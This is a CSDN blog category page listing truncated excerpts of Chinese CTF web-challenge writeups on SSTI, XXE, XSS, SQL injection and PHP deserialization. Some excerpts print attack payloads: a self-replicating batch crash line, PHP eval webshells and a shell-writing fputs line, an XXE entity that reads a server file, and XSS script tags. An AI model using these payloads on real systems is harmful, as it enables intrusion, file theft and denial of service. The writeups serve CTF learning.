webctf
文章平均质量分 73
Sakura-501
这个作者很懒,什么都没留下…
展开
-
2022/3/15 Flask-Session
Flask-Session客户端 session 导致的安全问题p牛写的一篇文章:关于客户端session的介绍:在传统PHP开发中,$_SESSION变量的内容默认会被保存在服务端的一个文件中,通过一个叫“PHPSESSID”的Cookie来区分用户。这类session是“服务端session”,用户看到的只是session的名称(一个随机字符串),其内容保存在服务端。然而,并不是所有语言都有默认的session存储机制,也不是任何情况下我们都可以向服务器写入文件。所以,很多Web框架都会另辟原创 2022-03-15 12:05:26 · 510 阅读 · 0 评论 -
2022 寒假的一些学习记录
2022 寒假的一些学习记录@echo off%0 | %0 (windows循环批处理死机)<?php@eval(‘echo $_GET[x];’);?>(可以执行系统命令)(写入一句话文件)<?phpfputs(fopen(“shell.php”,w),’<?php @eval($_GET[cmd]);?>’);?>data协议:data://text/plain,<?php phpinfo();?>data://text/plai原创 2022-01-22 11:23:42 · 5269 阅读 · 0 评论 -
2021-08-24 corCTF2021-devme 知识点:GraphQL,json
文章目录前言一、工具和使用网址二、具体payload总结前言最近去看了看国外的题目,给打蒙了,第一道最简单的不会做,唉o(╥﹏╥)o,是一道关于GraphQL的题目,以前完全没接触过啊,一开始找到了突破点,但是一直在burpsuit尝试,这是条错误的道路啊啊啊啊,后面才了解到需要GraphQL有自己的内省查询,可以使用它的工具,啊啊啊啊,活到老学到老。一、工具和使用网址Introspection-GraphQL《解析 GraphQL 的查询语法》【译】GraphiQL查询工具YouTube原创 2021-08-24 12:12:58 · 647 阅读 · 0 评论 -
2021-8-23 [BJDCTF2020]EzPHP 知识点:php超全局变量,create_function,各种php的bypass
首先,本文借鉴的大老婆博客如下:出题大佬博客,详细讲解了各种知识点一位大佬的详细解题过程(偷懒,自己就不写了)就简单写写(赋值粘贴)一些比较重要的知识点(×create_function函数:看似平平无常,却暗藏杀机<?php$myFunc = create_function('$a, $b', 'return($a+$b);}eval($_POST['Y1ng']);\\');?>执行后,很明显有一句话注入,可以拿到权限function myFunc($a, $b){原创 2021-08-23 20:41:52 · 334 阅读 · 0 评论 -
2021-8-18 [强网杯 2019]高明的黑客 知识点:python-threading 脚本编写
看了大佬博客,手动打一遍(相当于复制粘贴了),-_-||大佬博客:强网杯 2019-高明的黑客强网杯 2019-高明的黑客(考察代码编写能力)short-code温馨提示:当在本地测试的时候,php版本需要大于等于7.0记录结果最好保存到一个文本文件中,因为直接在控制台很难找到!!!!import osimport reimport requestsimport threadingimport timeprint("开始时间:"+time.asctime(time.localtim原创 2021-08-18 17:15:40 · 173 阅读 · 0 评论 -
SQL布尔盲注代码示例
贴个代码,防止忘记GET型:import requestsimport timeflag=''#key="ERR"#url="http://bf06151e-232d-4024-8223-6d6171dfd75a.node4.buuoj.cn/search.php?"key="student number not exists"url="http://6a0bfa86-f4c3-45e5-907e-ba518a2fbf6d.node4.buuoj.cn:81?"for i in range原创 2021-08-15 23:29:50 · 137 阅读 · 0 评论 -
CTF8-XSS闯关 知识点:XSS,JavaScript
前言今日心血来潮,把前几个星期发现的XSS闯关拿来玩了一下,发现自己是真的菜。。不过看了一些大佬的博客,还是学到了一些JS的语法和xss的绕过姿势的!!!大佬博客:xss小游戏全通关-答案test.ctf8 xss注入解题记录Web安全测试学习笔记 - XSS靶场 - test.ctf8.comHTML实体字符转换在线编码网站解题payload:level1:?name=<script>alert(1);</script>level2:?keyword=" οnc原创 2021-08-04 17:29:19 · 859 阅读 · 0 评论 -
2021-7-30 [CISCN2019 华北赛区 Day1 Web2]ikun 知识点:逻辑漏洞,JWT伪造,python-pickle反序列化
文章目录前言前置知识一、JWT二、Python-pickle反序列化解题过程总结前言一开始看到kunkun,好家伙,做着做着发现这真是道难题,好你个姬霓太美,太菜了不得不去看大佬wp,才发现是我从未体验过得全新知识点,针不搓呢!!!前置知识参考大佬博客:https://www.cnblogs.com/Cl0ud/p/12177062.html一、JWTJWT解码网站Json Web Token详解JWT破解工具二、Python-pickle反序列化解题过程总结...原创 2021-08-03 15:37:34 · 616 阅读 · 1 评论 -
XXE漏洞,XML外部实体注入
XXE主要是利用了DTD引用外部实体导致的漏洞。几个关于XML漏洞的学习网站:XML DTD与XXE攻击浅谈XML实体注入漏洞JarvisOJ-api调用题解php框架slim架构上存在XXE漏洞(XXE的典型存在形式)[NCTF2019]True XML cookbook(内网)xml外部实体注入payload:<?xml version="1.0"?><!DOVTYPE a[<!ENTITY b SYSTEM "file:///home/ctf/flag.tx原创 2021-07-30 16:11:44 · 299 阅读 · 0 评论 -
2021-7-28 [MRCTF2020]Ezpop 知识点:php反序列化构造pop链
文章目录前言前置知识解题过程总结前言简单题但是自己做了挺久的。。,不过途中找到了好像是出题大佬的博客:https://ieki.xyz/前置知识①伪协议php://filter/read=convert.base64-encode/resource=index.php②php的魔术方法__construct()//创建对象时触发__destruct() //对象被销毁时触发__call() //在对象上下文中调用不可访问的方法时触发__callStatic() //在静态上下文原创 2021-07-28 17:24:40 · 477 阅读 · 0 评论 -
2021-7-26 [SWPU2019]Web1 知识点:mysql无列名注入
文章目录前言前置知识解题过程总结前言其实这道题昨天就做到了,昨天不会做只能去看大佬题解,一开始自己尝试了一会以为是xss,结果看大佬博客发现是mysql的无列名注入,也是经典的留言板二次注入,o(╥﹏╥)o又学习到了新知识点,今天再来复现一遍!(好像BUU复现的题目查询到表名只有一种方法了,比赛时好像有多种)借鉴的大佬博客:https://www.cnblogs.com/wangtanzhi/p/12241499.htmlhttps://www.cnblogs.com/Lee-404/p/128原创 2021-07-26 20:24:37 · 418 阅读 · 0 评论 -
SSTI-模板注入小知识
文章目录SSTI简要介绍flask/jinja总结SSTI借鉴大佬博客:https://www.cnblogs.com/20175211lyz/p/11425368.html浅析SSTI(python沙盒绕过)简要介绍SSTI 全称Server Side Template Injection,服务器模板注入。模板注入涉及的是服务端Web应用使用模板引擎渲染用户请求的过程,服务端把用户输入的内容渲染成模板就可能造成SSTI。模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务原创 2021-07-24 14:14:38 · 372 阅读 · 0 评论 -
2021-7-23 [CISCN 2019 初赛]Love Math 知识点:PHP函数的灵活运用 base_convert getallheaders
文章目录前言一、前置知识二、解题过程总结前言今天做到了一个有趣的题目,是对PHP函数的灵活运用,灵活转码,达到绕过设置的黑白名单的目的,实现命令的执行,总之题目很灵活o(╥﹏╥)o给虐哭了,看了大佬们的博客才懂得灵活运用一些神奇的函数,还有最多有三十六进制,所以有些进制会带有字母,所以造成了漏洞啊!!!一、前置知识先附上一些wp:大佬博客讲解1大佬博客讲解2大佬博客讲解3好用的网址:任意进制的转换一些函数:base_convert(number,frombase,tobase);:原创 2021-07-23 16:24:38 · 143 阅读 · 0 评论 -
2021-7-22 [安洵杯 2019]easy_serialize_php 知识点:变量覆盖,php反序列化字符串逃逸
文章目录前言重要知识点变量覆盖:PHP序列化和反序列化解题过程总结前言本身是要在昨天解这题的,结果解着解着就去做了session反序列化的题目了o(╥﹏╥)o,于是昨天的题今天做(o)/~,这个知识点也是第一次遇到,菜菜的我学习到了,翻阅了很多大佬的博客才一知半解,需要继续努力!!!重要知识点变量覆盖:extract示例讲解网站extract():作用:从数组中将变量导入到当前的符号表;该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的原创 2021-07-22 20:20:54 · 541 阅读 · 2 评论 -
2021-7-21 Jarvis OJ-PHPINFO 知识点:session反序列化 PHP
文章目录前言题目和参考链接:重要知识点:解题过程总结前言本次做题历程可以说十分有趣,先是在BUU上自己做着easy_serialize_php,看完源代码以为是跟session有关的反序列化(后面自己查了wp发现不是×-×),所以自己就去百度关于session反序列化的知识点,看着看着就去做到了这到例题☺可谓是一波三折啊提示:以下是本篇文章正文内容,本文借鉴了多位大佬的wp,仅供参考题目和参考链接:题目:http://web.jarvisoj.com:32784/相关知识点大佬讲解链接:原创 2021-07-21 17:58:27 · 383 阅读 · 6 评论 -
2021-07-20 [BJDCTF2020]Cookie is so stable 知识点:SSTI Twig Cookie注入
**[BJDCTF2020]Cookie is so stable****前言:**不得不说又是膜拜众大佬的一天,题目对于萌新来说实在是难啊,只能搜寻wp加了解知识点边学边做了o(╥﹏╥)oBUU实现题目复现,尽管题目写着cookie,但是重点却不是这 ̄□ ̄||。知识点:SSTI(Twig),cookie注入**前置知识:**主要就是需要了解SSTI,具体解决Twig的。附上大佬的链接,以下两篇文章都比较详细的讲了不同类型的SSTI,讲的是针不搓!一篇文章带你理解漏洞之SSTI原创 2021-07-20 17:31:15 · 354 阅读 · 1 评论 -
2021-7-20 [ASIS 2019]Unicorn shop 知识点:Unicode编码
**[ASIS 2019]Unicorn shop**在BUU实现题目复现,看题目意思独角兽商店,真别致知识点:Unicode编码,编码转换问题这个还真不会,所以一顿百度解决。。解题过程:打开链接:观察可以知道在下方输入id和price进行购买独角兽。。。尝试一番,输入id=1,price=4发现wrong commodity(错误商品):把每个商品都试一遍发现,只有第四个能行,但是又有另外一种限制only one char:burpsuit抓包查看源码,发现有提示跟utf-8原创 2021-07-20 12:19:25 · 239 阅读 · 0 评论 -
2021-07-19 [De1CTF 2019]SSRF Me 知识点:SSRF Flask MD5 local_file
111原创 2021-07-19 16:05:53 · 683 阅读 · 1 评论